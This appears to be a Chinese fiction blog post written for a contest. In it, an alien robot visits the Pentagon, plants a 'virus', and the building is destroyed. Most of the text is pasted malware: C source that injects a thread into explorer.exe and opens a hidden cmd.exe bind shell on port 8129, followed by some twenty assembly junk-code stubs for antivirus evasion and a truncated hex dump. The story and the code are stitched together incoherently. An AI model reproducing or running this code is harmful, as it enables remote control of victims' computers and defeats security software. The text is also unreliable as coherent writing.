“我”的缩影

作者: 教育创客学习学 | 来源:发表于2023-04-19 07:35 被阅读0次

我的内在缩影
呆在家里不出去的周末
我的毕业小缩影
缩影
缩影～
缩影
缩影
缩影
缩影
缩影

郑重声明：文章系原创首发，文责自负。

本文参与书香澜梦第六期征文活动。

引子

“我”Robot，来自河外星系，出于好奇，降到了这个绿色星球的六角大楼闲逛了一圈儿。想不到的是：这里的机器人比我们更人性化，我是机械外壳，在光照下会闪耀出金属的光质，而这里的机器人，从外表上看，与这里的人类几乎没有什么区别。

“我”Robot和玛丽对指

玛丽的怨气

“我”Robot在六角大楼遇到的第一个此星球的机器人，名叫玛丽。她是六角大楼外事处的一名高管，主要负责来访接待工作。

玛丽，高挑的个子，富有性感的身材，金黄色的卷发长长的，随着她的走动，就像黄色的瀑布飞泻般好看。特别是，玛丽的肌肤之亲让人心动，尤其是两只美丽的丹凤眼望着你，会怦然心动，我这个河外星系来的机器人，也差点失态。

我进入六角大楼时，为了自身的保护，不得不先向六角大楼的安保部的系统植入病毒：

#include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib") #include #include #include //参数结构 ; typedef struct _RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para) { WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind = (FARPROC)Para->dwbind; Plisten = (FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend = (FARPROC)Para->dwsend; Precv = (FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion = MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA)&WSAData); listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr = INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0); if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0; if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数，可以直接调用 si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformatio n))return 0; while(1) { memset(Para->Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("EXPLORER.EXE"); if(pID == 0)return 0; hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存 pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!pRemoteThread)return 0; // 将线程执行体ThreadProc 写入远程进程 if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile"); myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons"); myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll"); myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0"); strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0"); //写进目标进程 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0; if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {} FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap); return dwRet; 1.伪装vc++5.0 代码： PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jmp 原入口地址 ************************************************************************ 2.胡乱跳转代码： nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere /跳转到上面那段代码地址去！ somewhere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址 /在附近随意跳 jmp ... /... jmp 原入口地址 /跳到原始oep 90 55 8B EC 41 52 90 5A 49 5D 41 转储免杀 ************************************************************************ 3.伪装c++代码： push ebp mov ebp,esp push -1 push 111111 push 222222 mov eax,fs:[0] push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 4.伪装Microsoft Visual C++ 6.0 代码： PUSH -1 PUSH 0 PUSH 0 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68 PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68 POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP 原入口地址 push ebp mov ebp,esp jmp ************************************************************************ 5.伪装防杀精灵一号防杀代码： push ebp mov ebp,esp push -1 push 666666 push 888888 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 6.伪装防杀精灵二号防杀代码： push ebp mov ebp,esp push -1 push 0 push 0 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp sub esp,68 push ebx push esi push edi pop eax pop eax pop eax add esp,68 pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 7.伪装木马彩衣(无限复活袍)代码： PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jo 原入口地址 jno 原入口地址 call 下一地址 ************************************************************************ 8.伪装木马彩衣(虾米披风)代码： push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去！ someshere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址 /在附近随意跳 jmp ... /... jmp 原入口的地址 /跳到原始oep 9.伪装花花添加器(神话)代码：-----------根据C++改 nop nop nop mov ebp,esp push -1 push 111111 push 222222 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址 push eax retn ************************************************************************ 10.伪装花花添加器(无极)代码： nop mov ebp, esp push -1 push 0A2C2A push 0D9038 mov eax, fs:[0] push eax mov fs:[0], esp pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址 jmp eax ************************************************************************ 11.伪装花花添加器(金刚)代码：--------根据VC++5.0 改 nop nop mov ebp, esp push -1 push 415448 push 4021A8 mov eax, fs:[0] push eax mov fs:[0], esp add esp, -6C push ebx push esi push edi add [eax], al mov eax,原入口地址 jmp eax ************************************************************************ 12.伪装花花添加器(杀破浪)代码： nop mov ebp, esp push -1 push 0 push 0 mov eax, fs:[0] push eax mov fs:[0], esp sub esp, 68 push ebx push esi push edi pop eax pop eax pop eax add esp, 68 pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址 jmp eax ************************************************************************ 12.伪装花花添加器(痴情大圣)代码： nop ..........省略N 行nop nop push ebp mov ebp, esp add esp, -0C add esp, 0C mov eax, 原入口地址 push eax retn ************************************************************************ 13.伪装花花添加器(如果*爱)代码： nop ........省略N 行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax, 原入口地址 jmp eax ************************************************************************ 14.伪装PEtite 2.2 -> Ian Luck 代码： mov eax,0040E000 push 004153F3 push dword ptr fs:[0] mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0] pop eax jmp 原入口地址 '执行到程序的原有OEP ************************************************************************ 15.无效PE 文件代码： push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX \ POP EAX | POP EAX \ MOV DWORD PTR FS:[0],EAX |（注意了。。花指令） POP EAX / POP EAX | MOV DWORD PTR FS:[0],EAX / loop 原入口地址 ************************************************************************ 16.伪装防杀精灵终极防杀代码： push ebp mov ebp,esp add esp,-0C add esp,0C push eax jmp 原入口地址 ************************************************************************ 17.伪装木马彩衣(金色鱼锦衣)花代码 push ebp mov ebp,esp add esp,-0C add esp,0C mov eax,原入口地址 push eax retn ************************************************************************ 18. 在mov ebp,eax 后面加上 PUSH EAX POP EAX ************************************************************************ 19.伪装UPX 花指令代码： pushad mov esi,m.0044D000 lea edi,dword ptr ds:[esi+FFFB4000] push edi or ebp,FFFFFFFF jmp short m.00477F2A ************************************************************************ 20. push ebp mov ebp,esp inc ecx push edx pop edx dec ecx pop ebp inc ecx jmp 原入口 ************************************************************************ 【深层】伪装 WCRT Library (Visual C++) DLL Method 1 -> Jibz 黑客动画吧代码 + 汇编代码：使用黑客动画吧粘贴以下代码： 55 8B EC 83 7D 0C 01 75 41 A1 C0 30 00 10 85 C0 74 0A FF D0 85 C0 75 04 6A FE EB 17 68 0C 30 00 10 68 08 30 00 10 E8 89 00 00 00 85 C0 59 59 74 08 6A FD FF 15 08 20 00 10 68 04 30 00 10 68 00 30 00 10 E8 52…

当我植好这一组病毒，六角大楼的保安系统就为我所用了。

令我想不到的是，痛毒的植入，玛丽也失控了，她把我当成了这个星球上的更高级的控制器。她对我大吼大叫：“You charge us with your safekeeping,yet despite our best efforts.You countries wage wars, you toxify your earth .And pursue ever more imaginative means of self-destruction.You can not be trusted with your own survival."……

随着玛丽的吼叫，反恐精英部的机器人承受不住干扰，疯狂地按下了自暴按钮，“卟——”只有一声，整个六角大楼灰飞烟灭！

由于我的错误输入病毒，我也成了一个“我”的缩影，不复存在了！